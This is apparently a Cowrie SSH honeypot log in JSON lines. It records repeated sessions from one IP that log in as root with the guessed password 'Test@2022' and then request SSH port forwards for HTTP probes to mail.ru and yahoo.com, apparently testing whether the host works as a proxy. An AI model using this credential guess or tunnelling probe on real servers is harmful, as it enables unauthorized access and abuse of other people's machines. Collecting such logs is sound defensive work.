{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.922508Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.973030Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58180,"dst_ip":"1.2.3.4","dst_port":22,"session":"0208c0db87e0","protocol":"ssh","message":"New connection: 77.83.207.83:58180 (1.2.3.4:22) [session: 0208c0db87e0]","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.023795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.033788Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.075304Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.331048Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1733,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1733","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.383195Z","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.435165Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11386,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11386","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.577552Z","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.629516Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":22642,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22642","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.773625Z","session":"0208c0db87e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.824973Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.877224Z","src_ip":"77.83.207.83","session":"0208c0db87e0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58255,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd5d5e6e62a5","protocol":"ssh","message":"New connection: 77.83.207.83:58255 (1.2.3.4:22) [session: bd5d5e6e62a5]","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.925568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.926543Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:55.976869Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.224893Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12902,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12902","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.275580Z","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.325477Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":20563,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20563","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.468113Z","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.518043Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19807,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19807","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.660153Z","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.710561Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.761167Z","src_ip":"77.83.207.83","session":"bd5d5e6e62a5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58358,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fd8ee38341a","protocol":"ssh","message":"New connection: 77.83.207.83:58358 (1.2.3.4:22) [session: 5fd8ee38341a]","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.811679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.812599Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:56.863460Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.117448Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15534,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15534","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.169498Z","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.221323Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":32766,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32766","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.365308Z","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.416246Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":2052,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2052","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.561279Z","session":"5fd8ee38341a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.612236Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.663974Z","src_ip":"77.83.207.83","session":"5fd8ee38341a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58445,"dst_ip":"1.2.3.4","dst_port":22,"session":"60a0555f85db","protocol":"ssh","message":"New connection: 77.83.207.83:58445 (1.2.3.4:22) [session: 60a0555f85db]","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.712610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.713547Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:57.763617Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.012908Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29927,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29927","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.063798Z","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.113756Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":32579,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32579","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.256598Z","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.306825Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5792,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5792","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.448394Z","session":"60a0555f85db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.499088Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.549677Z","src_ip":"77.83.207.83","session":"60a0555f85db"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58530,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ee6bd815d57","protocol":"ssh","message":"New connection: 77.83.207.83:58530 (1.2.3.4:22) [session: 2ee6bd815d57]","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.599137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.600173Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.650037Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.899889Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18493,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:18493","sensor":"my-vps","timestamp":"2025-08-31T03:46:58.950944Z","session":"2ee6bd815d57"}
